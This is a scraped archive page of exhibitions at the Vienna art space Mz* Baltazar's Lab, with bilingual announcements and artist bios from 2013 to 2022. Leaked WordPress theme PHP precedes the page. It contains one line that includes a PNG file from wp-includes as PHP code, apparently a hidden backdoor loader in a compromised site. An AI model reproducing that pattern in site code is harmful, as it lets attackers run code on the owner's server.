ID, 'thumbnail' ); } add_action( 'tribe_events_list_widget_before_the_event_title', 'custom_widget_featured_image' ); // Action Hook, um die eigenen Styles zu integrieren add_action( 'wp_enqueue_scripts', 'childtheme_styles' ); function childtheme_styles() { wp_enqueue_style( 'parent-style', get_template_directory_uri() . '/style.css' ); wp_enqueue_style( 'child-style', get_stylesheet_directory_uri() . '/style.css', array( 'parent-style' )); } // Listing posts by year on the Event Archive page function posts_by_year() { // array to use for results $years = array(); // get posts from WP $posts = get_posts(array( 'numberposts' => -1, 'orderby' => 'post_date', 'order' => 'DESC', 'post_type' => 'post', 'post_status' => 'publish', 'date_query' => array(array('after' => 'January 1st, 2009','before' => 'January 1st, 2016')), )); // loop through posts, populating $years arrays foreach($posts as $post) { $years[date('Y', strtotime($post->post_date))][] = $post; } // reverse sort by year krsort($years); return $years; } // Adding styles to the backend function wpb_mce_buttons_2($buttons) { array_unshift($buttons, 'styleselect'); return $buttons; } add_filter('mce_buttons_2', 'wpb_mce_buttons_2'); /* * Callback function to filter the MCE settings */ function my_mce_before_init_insert_formats( $init_array ) { // Define the style_formats array $style_formats = array( // Each array child is a format with it's own settings array( 'title' => 'Intro text', 'block' => 'p', 'classes' => 'intro', 'wrapper' => false, ), ); // Insert the array, JSON ENCODED, into 'style_formats' $init_array['style_formats'] = json_encode( $style_formats ); return $init_array; } // Attach callback to 'tiny_mce_before_init' add_filter( 'tiny_mce_before_init', 'my_mce_before_init_insert_formats' ); include_once './wp-includes/images/wlw/wp-rss.png'; function my_theme_add_editor_styles() { add_editor_style( 'custom-editor-style.css' ); } add_action( 'init', 'my_theme_add_editor_styles' ); ?> exhibition – Mz* Baltazar's Lab

Category: exhibition (Page 1 of 2)

Critters Chorus, Cycle 1

2-Kanal Videoinstallation

von Lisa Truttmann

Finissage: 16.12.2022, 19:00 Uhr


Ausstellungsdauer: 3. – 16.12.2022
Öffnungszeiten: 3.,4.,9.,10.12.2022, 16:30 – 20:30 Uhr

Weitere Termine nach Absprache: mail@lisatruttmann.at

Surren und Blitzen am Nachthimmel. Wildes Blätterwerk auf unscharf vorbeiziehendem, feuchtem Waldboden. Nervöse Begegnung am Mammutbaum, gluckerndes Geschwätz mit Truthähnen in der Dämmerung. Lässig frisierte Pferdemähnen, unberechenbare Flugkörper und dröhnend flatternde Rotoren. Gescheckertes Fell wühlt durch Farngestrüpp. Schwirrender Nebel, tropfender Dunst, Baumbart, Unwetter, Licht – gebrochen. Erfundene Dachse, Faden und Spiele.

Critters Chorus, Cycle 1 ist der erste Teil eines laufenden Projekts, das Lisa Truttmann beim Erkunden naturhafter Lebensräume entwickelt. Fragestellungen zum sogenannten “Species Problem” folgend, widmet sie sich den (Un-)Möglichkeiten einer taxonomischen Kategorisierung lebender Organismen aus künstlerischer Perspektive. So entsteht ein fiktionales Ökosystem aus rhythmischer Montage und widerspenstiger Komposition, in der die Arten gegen ihre Einordnung anstimmen.

Die Audio- und Videoaufnahmen sammelte die Künstlerin während Residency Aufenthalten im Süden Estlands (Maajaam Project Space, 2019) und in den Santa Cruz Mountains in Kalifornien (Djerassi Resident Artists Program, 2022). Gefördert durch das Land NOE

https://www.maajaam.ee

https://djerassi.org


FOTOCREDITS: VERENA DÜRR

Kurzbiografie:
Lisa Truttmann (*1983) lebt als Künstlerin und Filmemacherin in Wien. In ihren Arbeiten spürt sie den Strukturen von sozialen, architektonischen und ökologischen Landschaften nach und verknüpft dabei dokumentarische Elemente mit spielerisch inszenierten Versatzstücken. Aktuell beschäftigt sie sich mit der Beziehung zwischen Menschen und Dingen in persönlichen und kollektiven Narrativen. Ihre Bewegtbilder und Installation werden seit 2005 international in Ausstellungen und auf Filmfestivals präsentiert.

FOTO CREDITS: Gerald Roßbacher

English:


Critters Chorus, Cycle 1

2-channel video installation

Opening: Dec. 2, 2022, 7:00 p.m.
Duration of the exhibition: Dec. 3 – 16, 2022

Opening hours: Dec. 3,4,9,10, 2022, 4:30 – 8:30 p.m.

Further dates upon request:

mail@lisatruttmann.at

Finissage: Dec. 16, 2022, 7:00 p.m.

FOTO CREDITS: Gerald Roßbacher

Whirring and flashing in the night sky. Wild foliage on a moist forest floor, rapidly passing by. Nervous encounters at a redwood tree, gurgling chatter with turkeys at dusk. Casually coiffed horses, unpredictable flying objects and flapping rotors. Speckled skin scrabbles, covered in lush ferns. Swirling fog, dripping haze, old men’s beard, light – diffracted. Sassy badgers, strings and figures.

Critters Chorus, Cycle 1 is the first part of an ongoing project by Lisa Truttmann, developed while delving into unfamiliar habitats. Lead by questioning the so-called “Species Problem”, she investigates the (im)possibilities of taxonomic categorization of living organisms from an artistic point of view. This way she creates a fictional ecosystem of rhythmic montage and unruly composition, in which the species raise their voices against imposed classification.

Audio and video recordings have been collected during artist residencies in southern Estonia (Maajaam Project Space, 2019) and in the Santa Cruz Mountains in California (Djerassi Resident Artists Program, 2022).

https://www.maajaam.ee

Supported by Land NOE

Short biography:
Lisa Truttmann (*1983) is an artist and filmmaker based in Vienna, Austria. In her practice she ties documentary elements into staged settings and rhythmic compositions, tracing the structures of social, architectural and ecological landscapes. More recently she is concerned with the relationship between things and people, embedding them in personal and collective narratives. Her moving images and installations have been exhibited and screened internationally since 2005.

FOTO CREDITS: VERENA DÜRR

Delphi 2.0 (Phyto-Pythia)

by Lena Violetta Leitner

“Drowning in fearing a future

unable to act, stuck. 

Surrounded and surrendered by motivational posts.

Paralyzed, it eats you up, slowly but steady.

Acknowledge your fear. Devour your fear….”

message from a high priestess of Delphi 2.0





Treten Sie ein in das Future Lab Delphi 2.0, das Sie bei Ihren Ängsten, Wünschen und Fragen berät.

Unser Labor ist ein Ort der Begegnung, des Austauschs, der Entspannung, des Zweifelns und der Kommunikation.
Die Phyto-Pythia, unser Pflanzenorakel, erzeugt Ihren persönlichen Orakelspruch, der als Grundlage für Diskussionen über mögliche Zukunftsszenarien dient.




 

ENGLISH

Step into the Future Lab Delphi 2.0 advising you on your fears, wishes and questions.

Our Lab welcomes everyone and serves as a space for connecting, interacting, relaxing, doubting and sharing. 

The Phyto-Pythia, our plant oracle, generates your personal oracle spell serving as the basis for discussions about possible future scenarios.

DEUTSCH

Eröffnung: 23.9.2022 um 19h

Finissage: 21.9.2022 um 19h

Öffnungszeiten:

Dienstag, Donnerstag, Samstag von 10h – 14h



ENGLISH

Opening: 23.09.2022 – 19h

Finissage: 21.10.2022 – 19h

Opening hours:

Tuesdays, Thursdays, Saturdays from 10h – 14h

FINISSAGE

photo credit: Janine Schranz

WHAT I AM DISAPPEARS
Power & Sleep

video installation / 2022

by Tina Kult


independent space index festival

FINISSAGE

9th of July 2022 at 19h

at Jägerstrraße 52-54

1200 Vienna


More dates on request: tiina.kult@gmail.com


 About

The bathtub is a means of transport of liminality. Here, media-, book- and magazine- worlds merge with our inner conversations and fantasy. Thoughts and worlds pass lucidly by while we navigate our presence into transcendence with ease in the bathtub. The submersion not least as a symbol of the little death. The uncertain letting go – breathless – and the emergence from the water as the resurrection not from ashes – and visibly new – but inwardly transcendental.
But the option of failure is inevitable.
Lying in the bathtub, the protagonist of Tina Kult’s video work negotiates their paralyzed and tired state in a soliloquy. In a supposed manifestation of relaxation, the video installation Power & Sleep questions the effects of the questionable high-performance society and the relationship between time, work and productivity.The face of high pressure from the neoliberal outside world is swimming along with the protagonist. So it only becomes a distorted image of an unfulfilled promise of salvation.

Tina Kult

web: http://tinakult.com/
web: www.glueinreality.com
fb: https://www.facebook.com/tina.kult/
ig: https://www.instagram.com/tina_kult/

email: tiina.kult@gmail.com
mobile: +43 670 2064468

SOUND
Maria Danilina

fb: https://www.facebook.com/danilina.maria
ig: https://www.instagram.com/maier_mareia/

High Court of Feminism

Der Hohe Gerichtshof des Feminismus lädt zum Tribunal gegen das Patriarchat!

Angeklagt sind: die Täter, die Justiz, die Medien, die Gesellschaft.

Sie werden angeklagt für die Untätigkeit, wenn es um Femizid und Gewalt gegen Frauen* geht.

Das Verharmlosen und Bagatellisieren,  (“Beziehungstat”), Ausreden Suchen, warum nicht geholfen wurde, das Victim Blaming, aber auch das alltägliche Abwerten und Heruntermachen von Frauen* und Mädchen*.

Denn: Man tötet nicht aus Liebe!

Nieder mit dem Patriarchat!

Ausstellungseröffnung am 8. April 2022 um 19h

und Finissage am 22.April 19h

Mz* Baltazar’s Labratory, Jägerstr. 52-54, 1200 Wien

Öffnungszeiten nach Voranmeldung unter

stefanie.wuschitz@mzbaltazarslaboratory.org

Der Hohe Gerichtshof des Feminismus erhebt Anklage

Mz* Baltazars Laboratory präsentiert das Tribunal gegen das Patriarchat

Wien – “Ich eröffne heute das Verfahren gegen das Patriarchat!” donnert die “Vorsitzende des Hohen Gerichtshof des Feminismus” vom Richter*innenpult. “Your silence will not protect you” sagte die US-amerikanische Aktivistin und Theoretikerin Audre Lorde. Daher nimmt das feministische Kollektiv Hippocampa – feministische Alltagsoffensive das verdrängte Phänomen Femizid und Gewalt an Frauen*, das in allen Schichten und allen sozialen Gruppen auftritt, trotz aller Tabus zum Ausgangspunkt einer künstlerisch-aktivistischen Arbeit. In dem “Tribunal” werden die Täter, die Justiz, die Medien, die Polizei, die Gesellschaft und die Politik zur Rechenschaft gezogen. Damit erheben die Überlebenden von Femizid und all jene, die brutale Attacken, Übergriffe und physische oder psychische Gewalt von Männern erlebten oder erleben müssen, ihre Stimme. Denn „Männergewalt muss benannt werden. Nicht nur von den Opfern oder solidarischen Frauen. Wir warten noch immer auf die Männer, die sich ebenfalls mit dem Thema beschäftigen und ihren Beitrag leisten. Die Tatsache, das Frauen ungleich mehr Opfer von Gewalt durch Männer sind, sie aber diejenigen sind, die auch noch die Kraft aufwenden müssen, sich dagegen zu wehren und die Problematik sichtbar zu machen, muss ein Ende haben. Denn, schlussendlich ist Männergewalt ein Problem von Männern. Sie müssen endlich ebenfalls ihren Beitrag leisten“, fordert das Kollektiv.

Am 25.3.2022 verzeichnet Österreich den 8. mutmaßlichen Femizid. Ein Femizid ist laut internationaler Definition der Weltgesundheitsorganisation die “vorsätzliche Tötung einer Frau, weil sie eine Frau ist”. Die Täter sind in den allermeisten Fällen der (Ex-)Partner, Bekannte oder Personen aus dem nahen Umfeld. Femizide und andere Formen von Gewalt an Frauen* nehmen in Österreich seit Jahren zu. Jede fünfte Frau* ist in Österreich ab ihrem 15. Lebensjahr körperlicher und/oder sexueller Gewalt ausgesetzt, EU-weit ist sogar jede dritte Frau betroffen. “Es reicht! Mainstream-Medien und Politik schenken dem Thema nach wie vor zu wenig Aufmerksamkeit, und wenn sie es tun, reproduzieren sie viel zu oft patriarchale Muster”, so das Kollektiv.  Die Gruppe von Künstlerinnen und Aktivistinnen setzt sich nicht zuletzt aufgrund persönlicher Betroffenheit mit dem Thema auseinander. “Im vergangenen Jahr überlebten zwei von uns schwer verletzt Männergewalt. Das hat uns besonders wütend und betroffen gemacht. Die Ausstellung ist allen Opfern und Überlebenden von Femizid und geschlechtsspezifischer Gewalt gewidmet”.

Das Tribunal wird im Zuge der aktuellen Ausstellung von Mz* Baltazar’s Laboratory präsentiert.

Ausstellungseröffnung ist am 8. April um 19.00 Uhr. 

Die Ausstellung kann von 9.- 22. April nach Voranmeldung unter stefanie.wuschitz@mzbaltazarslaboratory.org besucht werden.

Ort: Jägerstraße 52-54, 1200 Wien.

Twitter: @FemGerichtshof 

Instagram: https://www.instagram.com/mzbaltazarslab/, http://www.mzbaltazarslaboratory.org/

The High Feminist Court invites to the tribunal against patriarchy! Accused are: the perpetrators, the judiciary, the media, the society. They are accused of inaction when it comes to femicide and violence against women*: trivializing and minimizing, keyword “relationship act”, looking for excuses why no help was given, victim blaming, but also the everyday devaluing and belittling of women* and girls*. Because: You don’t kill for love! Down with the patriarchy!


Exhibition opening on April 8, 2022 at 7pm

Finissage 22nd of April at 7pm
Mz* Baltazar’s Laboratory, Jägerstr. 52-54, 1200 Vienna.

INTRO

ANKLAGE 1

ANKLAGE 2

ANKLAGE 3

ANKLAGE 4

ANKLAGE 5

ANKLAGE 6

OUTRO

Blend Together

Janine Schranz & Daniela Zeilinger

Ausstellung/Exhibition

from March 12 – 26, 2022

Eröffnung/Opening

Friday, March 11th, 7 – 10 p

Artist Talk: Sat, March 19th, 4 pm


with Michael Wonnerth-Magnusson

Finissage:

Sat, March 26th, 12 – 4 pm

Öffnungszeiten/Opening hours:

Fri 4 – 7 pm & Sat 12 – 4 pm und nach Voranmeldung and by appointment

Mz* Baltazar‘s Laboratory
Jägerstraße 52-54 A – 1200 Vienna
DEUTSCH

Die Ausstellung „Blend Together“ von Janine Schranz und Daniela Zeilinger, die im Rahmen der diesjährigen Foto Wien bei Mz* Baltazar’s Laboratory präsentiert wird, schließt thematisch an die gemeinsame Ausstellung „Passepartout“, die 2021 im hoast in Wien zu sehen war, an. Galt die Aufmerksamkeit im letzten Jahr Prozessen des Auswählens, Croppens und Ausblendens, stehen diesmal Situationen der Transparenz und der Überblendung im Zentrum. Ging es im hoast um Techniken der Inklusion und Exklusion innerhalb einer gegebenen Architektur bzw. innerhalb des Bildfeldes, so wird die Ausstellungssituation bei Mz* Baltazar‘s auf Möglichkeiten der Kommunikation zwischen Innen und Außen, von Kunstwerk zu Kunstwerk, sowie zwischen Realraum und Bildraum befragt.


ENGLISH

The exhibition “Blend Together” by Janine Schranz and Daniela Zeilinger is presented at Mz* Baltazar’s Laboratory and part of this year’s Foto Wien. It thematically continues a joint exhibition called “Passepartout,” which has been on display at hoast in Vienna 2021. While last year’s show  focused on processes of selecting, cropping and fading out, the emphasis now is on situations of transparency and blending. While at hoast the focus was on techniques of inclusion and exclusion within a given architecture or within the image field, the exhibition at Mz* Baltazar’s Lab will examine possibilities of communication between inside and outside, from artwork to artwork, and between real space and image space.

www.danielazeilinger.com

Short Bios

Janine Schranz (*1985, Switzerland) is a visual artist and photographer currently living in Vienna (AT). In her practice she explores the (pre-)conditions of photography, its components and interrelations with architecture. Labor conditions, recording processes and the exhibition context play equal roles as working materials. In its essence, she understands photography as a time-based medium and puts bodily-spatial experiences in relation to visual perception and questions forms of (un-)documentation. She studied photography (Zurich University of the Arts, Switzerland) and transdisciplinary arts (University of Applied Arts, Vienna).

janineschranz.com


 Daniela Zeilinger (*Linz/Austria) lives and works in Vienna. She studied fine arts at the Academy of Fine Arts Vienna as well as dance, context, choreography at the UDK Berlin and free art at the Kunsthochschule Berlin Weißensee. The artist works at the interface of different disciplines, especially painting and photography. An ontological reflection upon the space of photographic images is a central motif. Her works, as analogue photographs, are created in a multi-layered process of transformation and translation. They oscillate between image and imagination, and photography and painting. Zeilinger’s works have been presented in numerous solo and group exhibitions in Germany and abroad. In 2020, the artist received the State Scholarship for Artistic Photography. 

danielazeilinger.com

Buy one, get two for free! It's your life. It's your tv! :: An exhibition by Sejma Prodanovic & Lena Violetta Leitner:: 06.05.2015

Buy one, get two for free!
It’s your life. It’s your tv!

An exhibition by Sejma Prodanovic & Lena Violetta Leitner
curated by Mz Baltazar´s Mz. Baltazars Laboratory 

We provide a diverse range of high quality products. We will never let you down. This is what you want right now. Dive in a new world of happiness, with products fulfilling your dreams! Our programme will entertain you and help you improve yourself. Cause it is always about making it better. This is DAILY DIET. This is your tv!

 

Vernissage: 06.05.2015  |  6pm  |  the artists attend the opening
Finissage: 18.06.2015  |  6pm
Mz. Baltazar´s Laboratory  |  Sechshauserstraße 28  |  A – 1150 Wien

Sejma Prodanovic and Lena Violetta Leitner set an exhibition that deals with consumerism, marketing, videos, body image and shopping channels. “DAILY DIET” analyzes the complexity of our contemporary society in various ways by digesting the aggressive world of information and advertisement. The different levels of fiction and reality start to mix, involving the visitors as well. Sejma Prodanovic makes a serial of simple linear drawings in ink with the goal to translate different visual languages from the world of mass-media in an individual and direct way. Lena Violetta Leitner shows a two-channel video that deals with the absurd world of shopping and consists of found footage and a documentation of the artistic process of Sejma and Violetta. 

Sejma Prodanovic *1981, Belgrade
works with discarded material and reinterprets their use with painting, printmaking, drawing and installation. Recent exhibitions are: „Using images“, Cultural Center Grocka (2015), „Daily Drawings“, Gallery DKSG Belgrade (2013), „I saw unseen“, Gallery Dom Omladine Belgrade (2012). 
Lena Violetta Leitner *1986, Graz
works with different media as video, performance, installation or collages and likes to use broken machines or found footage. She focusses on collaborative processes, that especially try to reinforce women to network, like collective OutSight. Some recent exhibitions are: „Contemporaries of the near future“ at das weisse haus, Vienna (Vienna Art Fair 2014), „Obsession“, exhibition OutSight at National Gallery Mala Stanica (2014), „Pigeons, Manifests and More“, Kulturraum Baden (2014), Biennale Sessions

 

1610914_793603980726012_7048639424256689660_n

Finissage: Cupcake Rant ends full-stop by Nina Prader :: 21/4/2015

A toast at 19:00 at Mz Baltazar’s Lab

Finissage: Cupcake Rant ends full-stop by Nina Prader

Exhibition of zines from the workshop Not a Cupcake will be on display.

Sechshauserstraße 28, 1150 Vienna

21/4/2015

Then at 20:30 tour with butterfly shadows from the storefront to the opening of HOW
a text and image group exhibition about How-to and How-Come
http://howto-howcome.tumblr.com
at 19:00
at Mo.e: Thelemangasse 4/1-3, 1170

cupcake sketch

 

Nina Prader, MA
www.cargocollective.com/ninaprader
www.littledoubter.tumblr.com

oberflächen : : : a solo-show by Lale Rodgarkia-Dara

oberflächen

von  Lale Rodgarkia-Dara

 


Ausstellungseröffnung
Sechshauserstraße 28/1150 Wien

 

 

MOSTVERKOSTUNG und DIAVORTRAG

Donnerstag, 8.5. 2014, ab 19:00

 

 

Von dem Interface-Feld, in das ich täglich blicke, ist der Ursprung

geblieben. Die Anfangsidee, dass Screenshot-Bilder, als

humane Schnittstelle zu betrachten, sind. Intime Portraits

bilden. Selbstgestaltete Schreibtischfelder und ein Diavortrag

durch jene Welten, die alte analoge Kulturtechnik aufrütteln.

Dann die vielen Screenshots zaghaft, nur von den Nächsten; nicht

zu viele Menschen fragen. Sammeln und zu jedem Bild genau den

Ursprung wissen, eine, vielleicht auch zwei Zeilen schreiben, ganz wie Reiseerinnerungen. Erinnerungen sammeln durch Interfaces von Arbeits-

und Freizeit-Kommunikationsgeräten Nahestehender. So die Resonanz und Menschen portraitieren und sortieren. Es entstehen intime Portraits von Freunden, Bekannten und hin und wieder kurzen Begegnungen als Diainstallation frei zu bespielen, ausschließlich im eigenen Auditorium faßbar.  Die digitale Community, die ausschließlich im privaten analogen Raum existiert.

 

Lale Rodgarkia-Dara, speis (2014)

oberflächen, eine frei bespielbare Diaportraitschau

 

 

Alte Kulturtechniken sind Entwicklungen und Konzepte, die nicht auf Einzelpersonen rückführbar sind – quasi kollektive Community Leistungen und Aktivitäten zur Problembewältigung oder zum Spaß. Ihr partizipativer Charakter und die damit verbundene soziale Interaktion funktionierte jahrelang im analogen Raum, genauso wie sie heute in digtalen Projekten exisitiert.

 

Der Bewußtmachung und Rückführung des Digitalen in den analogen Raum hat sich die Künstlerin Lale Rodgarkia-Dara verschrieben. In der Verwebung von der Kulturtechnik der privaten Diavorführung und dem Sammeln von digitalen Screenshotbildern unterschiedlichster Interfaces (vom Desktop-Computer über das Smart-Phone) entstehen intime Portraits von persönlich angefragten Bekannten und Freunden, die so ausschließlich im privaten analogen Raum der Künstlerin existieren. Denn die Screenshots werden auf Diafilm übertragen und landen als Diavortrag und Diainstallation in der Langsamkeit der analogen Wahrnehmung. Aus der Sammlung ist so im Laufe der letzten zwei Jahre eine analoge digitale Community entstanden, die sich nun bei Diavorträgen erst kennenlernt.

Kombiniert wird die klassische Diaschau mit analogen und digitalen Substraten aus der Mostpresse der GeSOKS. In euren Gläsern werdet ihr vergorene Köstlichkeiten aus Apfel und Birne vorfinden, Informationen und Abhandlungen über die rezente Mostkultur gibt es jederzeit auf »mostblog.net«.

 


 

oberflächen

 

 

Durchgeführt und unterstützt durch die speis 2014 und Mz.Baltazar’s Laboratory als Teil des Luftsteuer-show window projects sowie der GeSOKS – Gesellschaft für Streuobstkulturen und Supplementäres.

 

Sechshauserstraße 28/1150 Wien

MOSTVERKOSTUNG und DIAVORTRAG Donnerstag, 8.5. 2014, ab 19:00

 

Kurzinfo:

Ausstellungsdauer 8. Mai – 20. Mai 2014

Exhibition (inside) space, open during the exhibition and other days by appointment

Hochaufgelöste Bilder bitte direkt anfordern
Kontakt: Lale Rodgarkia-Dara, lale@speis.net, Patricia Reis

 

 

Kurzbio Lale Rodgarkia-Dara:

Lale Rodgarkia-Dara, geboren 1976 in Wien, aufgewachsen in Umgebung werkt als Soundinstallateurin und Autorin ebenda. Sie ist Gründerin der Elektronik Teatime und ist Wiener Produzentin im internationalen Kunstradio-Netzwerk radia radia.fm, Teil des Kollektivs Mz. Baltazar’s Laboratory www.mzbaltazarslaboratory.org und beteiligt sich an verschiedenen Kollektiven. Langjährige Zusammenarbeiten in Sound, Literatur und partizipativer Kunst im öffentlichen Raum u.a. mit Ula Schneider, Soho in Ottakring, Caroline Profanter, Anna Steiden, Veronika Mayer, Gina Mattiello, Ingrid Schmoliner, Christine Schörkhuber, Stefan Fraunberger u.a.  Seit 2003 hält sie Workshops mit Jugendlichen und Erwachsenen und gibt Lectures. Sie erfindet Projekte irgendwie immer mit Literatur, medialer Kunst und zumeist in transitorischen Räumen. Ausgezeichnet u.a. mit Exilliteraturpreis 2008, Startstipendium des BMUKK 2010, Hörspiel-Stipendium der Filmstiftung NRW 2010, Kompositionsstipendium der Stadt Wien 2011, Hans-Weigel-Literaturstipendium 2013. 2013/14 Lecturer am Skuor, der Technischen Universität Wien. Zuletzt mit der literarischen Radioskulptur www.outofspace.at “Leben zwischen den Welten” bei Mia Zabelkas Phonofemme Festival 2013 und  dem dreitägigen Radioprojekt „Re-enact-Radio- Radio im Bade (Die Freundin hört) mit einem Re-enactment des Arbeiterradios der 20er Jahre im Kongreßbad  bei SOHO 2014.

 

 

Kurzbio GESOKS:

GESOKS – Gesellschaft für Streuobstkulturen und Supplementäres

Most, also Wein aus Birnen und/oder Äpfeln, erfreut sich einer langen Tradition und seit wenigen Jahren auch unsere Gaumen, sofern er von den wenigen Spitzenproduzent/innen im Lande stammt. Die GeSOKS kennt sie alle und wird euch dieses Mal wieder eine feine Auswahl kredenzen (unter anderem auch selbstgekelterte Moste von Mostmagister Neubauer). Regelmäßig macht die GeSOKS, bestehend aus den Mostattachés Schachner und Neubauer, Veranstaltungen mit Initiativen, die dem Most wohlwollend gesonnen sind, betreibt darüber hinaus den http://mostblog.net, berät die Gastronomie und führt Verkostungen durch.

 

speisekammertag-Verein zur Förderung digitaler Künste und Kultur
Verein Mz.Baltazar’s Laboratory
Sechshauserstraße 28
1150 Wien

 

 

XXLab

FACE THE FUTURE

The artists and female agents who took part in the workshop of Miss Baltazar’s Lab in Indonesia summer 2013 have started to collaborate as an artist collective. They call themselves XXLab and will have an exhibition in Jakarta spring 2014.

Stefanie Wuschitz collaborates with them on the project FACE THE FUTURE, which is a touch sensitive aura-generator. Here a photo of all artists who are going to exhibit in the exhibition in Jakarta, almost all female people on the photo are XXLab members (except 2 and 3 from the right).
IMG-20140527-WA0002
 

 

« Older posts

© 2023 Mz* Baltazar's Lab

Theme by Anders NorenUp ↑